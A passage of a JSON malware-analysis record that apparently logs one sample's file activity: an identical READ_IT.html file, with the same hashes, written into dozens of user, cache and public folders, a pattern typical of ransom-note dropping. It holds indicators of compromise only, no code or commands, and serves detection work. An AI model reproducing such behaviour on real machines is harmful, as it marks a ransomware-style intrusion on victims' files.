"C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\AE\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ae\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\FD\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\fd\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\E0\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\e0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\C3\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\c3\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\8D\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\8d\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\49\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\49\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\2C\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\2c\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\9\\10\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\9\\10\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\AE\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\ae\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\8\\67\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\8\\67\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\7\\26\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\7\\26\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\F1\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\f1\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\5\\1B\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\5\\1b\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\EE\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\ee\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\4\\20\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\20\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\3\\DA\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\3\\da\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\BC\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\bc\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\59\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\59\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\F6\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\f6\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\E4\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\e4\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\14\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\14\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\0C\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\0c\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\03\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\03\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\F4\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\f4\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\E1\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\e1\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\CB\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\cb\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\A8\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\a8\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\98\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\98\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\Profiles\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\videos\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\videos\\sample videos\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\recorded tv\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\pictures\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\music\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\music\\sample music\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Libraries\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\libraries\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Downloads\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\downloads\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\documents\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun\\Java\\Java Update\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\sun\\java\\java update\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\READ_IT.html", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\READ_IT.html", 